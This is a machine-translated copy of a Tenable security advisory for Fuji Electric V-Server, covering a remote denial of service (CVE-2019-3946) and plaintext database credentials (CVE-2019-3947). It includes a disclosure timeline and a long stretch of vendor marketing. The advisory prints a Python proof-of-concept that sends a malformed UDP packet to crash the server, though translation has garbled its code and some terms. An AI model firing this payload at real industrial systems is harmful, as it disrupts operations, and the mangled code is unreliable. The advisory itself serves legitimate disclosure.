脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

富士电机株式会社V-Server拒绝服务和信息披露

媒介

剧情简介

cve - 2019 - 3946:未经身份验证的远程拒绝服务

站得住脚的发现了一个拒绝服务漏洞在富士电气V-Server 6.0.33.0版本。拒绝服务的结果是一个整数溢出发生在处理的命令51消息发送到UDP端口8005。以下概念证明再现了这个问题:

进口sys、插座、ssl、argparse binascii从结构导入* def mk_msg (cmd,数据,seq = 1): mlen = 5 + len(数据)味精=包(> HHB, mlen seq, cmd) +数据;返回味精;解析器= argparse.ArgumentParser()解析器。add_argument (“target_host”,帮助=“V-Server主机”)解析器。add_argument (“target_port”,帮助= " V-Server端口(即。8005)”,类型= int)参数= parser.parse_args主机= args ()。target_host端口=参数。target_port s = socket.socket(套接字。AF_INET socket.SOCK_DGRAM) s.settimeout (5)。连接((主机、端口))= ' VSVR #魔法数据+ =包(' > H ', 0 x3e7) # sub-command数据+ = A * 0 x20 # DB数据源名称数据+ = B * 0 x20 # DB用户名数据+ = ' C ' * 0 x20 # DB用户信誉数据+ = ' D ' * 0 x80 #表名items_hdr = ' U ' * 0 xc items_hdr + =包(' > H ', 0 xffff) #项数items_hdr + = ' U ' * 0 xc数据+ = items_hdr #物品而len(数据)+ 6 > = 0 x1388 - 5:数据+ =包(x8001 >终极战士,0,0 xc 0 x8001)味精= mk_msg(51、数据);s.send(味精)res = s.recv(1024)打印binascii.hexlify (res)

cve - 2019 - 3947:明文密码存储

此外,DB凭证披露漏洞存在于V-Server项目文件。V-Server可以连接到一个SQL服务器。这允许一个数据库用于日志存储。通过V-Server DB凭证输入UI保存在项目文件。但似乎DB凭证存储在纯文本,这可能被未经授权的用户。下面是一个示例项目文件与可见数据库凭证。

解决方案

升级到V-Server 6.0.33.0或更高版本。

披露时间表

11/15/2018——站得住脚的找不到一个安全的联系所以他们填写联系人表格要求安全联系。(询价数量:G18005094)
11/15/2018——富士要求细节。
11/19/2018——站得住脚的发送细节。
11/21/2018白光,富士公司,试图联系站得住脚的但是站得住脚的从来没有收到电子邮件。
01/03/2019——站得住脚的要求更新。
01/07/2019——富士表明白光应该联系站得住脚的。
01/07/2019——白光成功联系站得住脚的。
白光01/10/2019——站得住脚的披露。
01/22/2019——白光要求冲程体积项目文件。
01/28/2019——白光ping站得住脚的。
01/28/2019——站得住脚的发送项目文件和附加说明繁殖。
01/29/2019——白光谢谢站得住脚的。
03/17/2019——白光显示补丁日期5月30日,2019年。
03/19/2019——站得住脚的承认。
05/14/2019 -站得住脚的白光问道,如果5月30日仍然是计划日期。
05/15/2019 -白光承认5月30日仍然是计划发布日期。
05/29/2019 -站得住脚的问哈科如果明天仍然是发布日期。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2019 - 27所示
CVSSv2基地/时间的分数
5.0/3.7
CVSSv2向量
AV: N /交流:L /非盟:N / C: N /我:N: P
受影响的产品
富士电机株式会社V-Server 6.0.33.0之前
风险因素
媒介

咨询时间

06/11/2019——最初版本

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map